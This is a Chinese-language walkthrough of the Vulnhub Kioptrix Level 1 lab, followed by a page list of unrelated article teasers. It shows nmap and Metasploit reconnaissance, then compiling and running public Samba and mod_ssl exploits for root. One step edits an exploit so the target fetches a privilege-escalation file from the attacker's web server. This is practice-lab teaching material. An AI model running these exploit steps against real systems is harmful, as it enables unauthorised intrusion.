Vulnhub靶机:Kioptrix_Level1

一、介绍

运行环境:Virtualbox

攻击机:kali(192.168.56.101)

靶机:Kioptrix_Level1(192.168.56.105)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

二、信息收集

使用nmap主机发现靶机ip:192.168.56.105

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、111、139、443、1024

nmap -A 192.168.56.105 -p 1-65535

在这里插入图片描述

打开网站未发现可利用的功能点和隐藏信息

在这里插入图片描述

根据nmap的扫描结果发现开放了139端口,smb服务,利用nmap脚本扫描139端口,发现靶机存在cve-2009-3103漏洞

nmap 192.168.56.105 -p 139 --script smb*

在这里插入图片描述

在网上找了很多exp,发现都利用不了

使用msf探测一下smb服务的版本信息,为samba 2.2.1a

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
show options
set rhosts 192.168.56.105
run

在这里插入图片描述

三、漏洞利用

使用searchsploit搜索该版本的samba的历史漏洞,发现命令执行漏洞,将exp导出

searchsploit samba 2.2.1a

在这里插入图片描述

编译,根据脚本的注释执行脚本

gcc 10.c -o 10
./10 -b 0 -v 192.168.56.105

在这里插入图片描述

获得root权限

在这里插入图片描述

还有一个方法是利用Apache mod_ssl漏洞

根据nmap的扫描结果80端口安装Apache/1.3.20 mod_ssl/2.8.4

使用searchsploit搜索mod_ssl的历史漏洞

searchsploit mod_ssl

在这里插入图片描述

发现三个对应版本的exp,我们挨个尝试,发现都报错

gcc -o 764 764.c -lcrypto

在这里插入图片描述

最后发现是exp的问题,我们下载最新的exp:https://www.exploit-db.com/exploits/47080

编译执行

在这里插入图片描述

根据靶机系统和apache的版本选择偏移量,构造命令

./exp 0x6b 192.168.56.105 -c 40

在这里插入图片描述

得到apache的权限的shell

理论上应该是root权限,发现在exp执行时,出现报错:找不到ptrace-kmod.c文件

在这里插入图片描述

在exp源码查找出现问题的地方,在309行,会在靶机执行命令下载ptrace-kmod.c文件,而我的靶机网络设置的是仅主机模式,下载不了

nl exp.c| grep ptrace

在这里插入图片描述

我们可以将ptrace-kmod.c文件下载到本地,然后在本地开一个web服务器,让靶机请求攻击机获取ptrace-kmod.c文件

cd /var/www/html 
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c 
service apache2 start

在这里插入图片描述

修改exp源码,将请求改为攻击机的ip

在这里插入图片描述

保存编译执行,得到root权限

在这里插入图片描述

参考链接:Vulnhub系列:Kioptix Level 1_vulnhub kioptix level 1-CSDN博客

KIOPTRIX: LEVEL 1 通关详解_kioptrix level 1 - 搜狗搜索-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/451613.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

GIS学习笔记(四):GIS数据可视化综合(矢量数据)

矢量数据 arcgis的主要可视化工具:属性 符号系统 符号系统 按类别 这里不会涉及到数字的大小因素,只是按照字符的分类去做可视化 “唯一值”的含义 “建筑年代”字段共有10个年份,一个年份也许有多个数据( eg.1990年的建筑有20个)&…

MySQL 事务的原理以及长事务的预防和处置

transaction_isolation 隔离级别 读未提交 读提交 视图是在每个 SQL 语句开始执行的时候创建的 可重复读 视图是在事务启动时创建的,整个事务存在期间都用这个视图 串行化…

【NR 定位】3GPP NR Positioning 5G定位标准解读(十)-增强的小区ID定位

前言 3GPP NR Positioning 5G定位标准:3GPP TS 38.305 V18 3GPP 标准网址:Directory Listing /ftp/ 【NR 定位】3GPP NR Positioning 5G定位标准解读(一)-CSDN博客 【NR 定位】3GPP NR Positioning 5G定位标准解读(…

python读取execl里的图片

正常的读取图片 from openpyxl import load_workbook from PIL import Imagefrom openpyxl import load_workbook wb load_workbook(rC:\Users\Administrator\Downloads\output1111.xlsx) ws wb[wb.sheetnames[0]] for image in ws._images:data image.anchor._fromif image…

接雨水(leetcode hot100)

给定 n 个非负整数表示每个宽度为 1 的柱子的高度图,计算按此排列的柱子,下雨之后能接多少雨水。 示例 1: 输入:height [0,1,0,2,1,0,1,3,2,1,2,1] 输出:6 解释:上面是由数组 [0,1,0,2,1,0,1,3,2,1,2,1] …

ST MotorControl Workbench 6.2.1 使用总结

目录 前言 软件安装 根据自己硬件配置参数 生成代码 开发板运行 ​ 总结 前言 好久没有玩ST的电机库了,已经更新到了MotorControl Workbench 6.2.1,6以上的版本比5的版本界面操作有很大的不同,核心算法有些增加。最近体验了一把使用自…

【NR 定位】3GPP NR Positioning 5G定位标准解读(十五)-UL-TDOA 定位

前言 3GPP NR Positioning 5G定位标准:3GPP TS 38.305 V18 3GPP 标准网址:Directory Listing /ftp/ 【NR 定位】3GPP NR Positioning 5G定位标准解读(一)-CSDN博客 【NR 定位】3GPP NR Positioning 5G定位标准解读(…

设计模式 -- 1:简单工厂模式

目录 代码记录代码部分 代码记录 设计模式的代码注意要运用到面向对象的思想 考虑到紧耦合和松耦合 把具体的操作类分开 不让其互相影响&#xff08;注意这点&#xff09; 下面是UML类图 代码部分 #include <iostream> #include <memory> // 引入智能指针的头文…

React 教程

学习主要来源 React 教程 | 菜鸟教程 React 是一个用于构建用户界面的 JAVASCRIPT 库。 React 主要用于构建 UI&#xff0c;很多人认为 React 是 MVC 中的 V&#xff08;视图&#xff09;。 React 起源于 Facebook 的内部项目&#xff0c;用来架设 Instagram 的网站&#xff0…

【ollama】(4):在autodl中安装ollama工具,配置环境变量,修改端口,使用RTX 3080 Ti显卡,测试coder代码生成大模型

1&#xff0c;ollama项目 Ollama 是一个强大的框架&#xff0c;设计用于在 Docker 容器中部署 LLM。Ollama 的主要功能是在 Docker 容器内部署和管理 LLM 的促进者&#xff0c;它使该过程变得非常简单。它帮助用户快速在本地运行大模型&#xff0c;通过简单的安装指令&#xf…

2023年第三届中国高校大数据挑战赛第二场赛题C:用户对博物馆评论的情感分析(附上代码与详细视频讲解)

问题重述&#xff1a; 博物馆是公共文化服务体系的重要组成部分。国家文物局发布&#xff0c; 2021 年我国新增备案博物馆 395 家&#xff0c;备案博物馆总数达 6183 家&#xff0c;排名全球前列&#xff1b;5605 家博物馆实现免费开放&#xff0c;占比达 90%以上&#xff1b;…

plantUML使用指南之序列图

文章目录 前言一、序列图1.1 语法规则1.1.1 参与者1.1.2 生命线1.1.3 消息1.1.4 自动编号1.1.5 注释1.1.6 其它1.1.7 例子 1.2 如何画好 参考 前言 在软件开发、系统设计和架构文档编写过程中&#xff0c;图形化建模工具扮演着重要的角色。而 PlantUML 作为一种强大且简洁的开…

Kafka消费者重平衡

「&#xff08;重平衡&#xff09;Rebalance本质上是一种协议&#xff0c;规定了一个Consumer Group下的所有Consumer如何达成一致&#xff0c;来分配订阅Topic的每个分区」。 比如某个Group下有20个Consumer实例&#xff0c;它订阅了一个具有100个分区的Topic。 正常情况下&…

Linux的MySQL安装与卸载

安装与卸载 卸载安装配置yum源安装MySQL 声明一下本人用的Linux版本是CentOs7.9版本的。 卸载 如果我们用的云服务器&#xff0c;云服务器可能会自带MySQL或者mariadb&#xff08;其实就是MySQL的一个开源分支&#xff09;&#xff0c;如果我们不想用自带的&#xff0c;需要先…

2023年全国职业院校技能大赛软件测试赛题第9套

2023年全国职业院校技能大赛 软件测试赛题第9套 赛项名称: 软件测试 英文名称: Software Testing 赛项编号: GZ034 归属产业: 电子与信息大类 赛项组别: 高等职业教育 …

“成像光谱遥感技术中的AI革命:ChatGPT应用指

遥感技术主要通过卫星和飞机从远处观察和测量我们的环境&#xff0c;是理解和监测地球物理、化学和生物系统的基石。ChatGPT是由OpenAI开发的最先进的语言模型&#xff0c;在理解和生成人类语言方面表现出了非凡的能力。本文重点介绍ChatGPT在遥感中的应用&#xff0c;人工智能…

BUGKU-WEB ezbypass

题目描述 题目截图如下&#xff1a; 进入场景看看&#xff1a; 解题思路 代码审计题目发现需要构造一个字符串&#xff0c;使得它不包含字母、数字、特殊字符的PHP代码片段&#xff0c;长度小于105&#xff0c;然后传递给$codepost提交参数&#xff0c;eval&#xff08;&…

【JS】浅谈防抖与节流

防抖与节流 前言一、防抖1.1是什么&#xff1f;1.2做什么&#xff1f;1.3应用场景&#xff1f;1.4实现原理&#xff1f; 二、节流是什么&#xff1f;2.1是什么&#xff1f;2.2做什么&#xff1f;2.3应用场景&#xff1f;2.4实现原理&#xff1f; 总结 前言 防抖与节流算是面试…

一起玩儿3D打印机——01 3D打印机初探

摘要&#xff1a;本文介绍3D打印技术的基本知识以及3D打印机的结构分类和组成 3D打印技术这几年得到了快速的发展&#xff0c;在一些特定领域和特定行业逐渐被越来越多的人所接受并大量使用。与之相关的供应链和产业链也日益壮大&#xff0c;并形成了完善的体系。 这次之所以…

虚拟化技术的介绍

查看是否支持虚拟化: Linux虚拟化平台安装 云服务类型: 华为云的介绍: 公有云配置 区域&#xff1a; 同一个区域中的云主机是可以互相连通的&#xff0c;不通区域云主机是不能使用内部网络互相通信的 选择离自己比较近的区域&#xff0c;可以减少网络延时卡顿 华为云yum仓库&…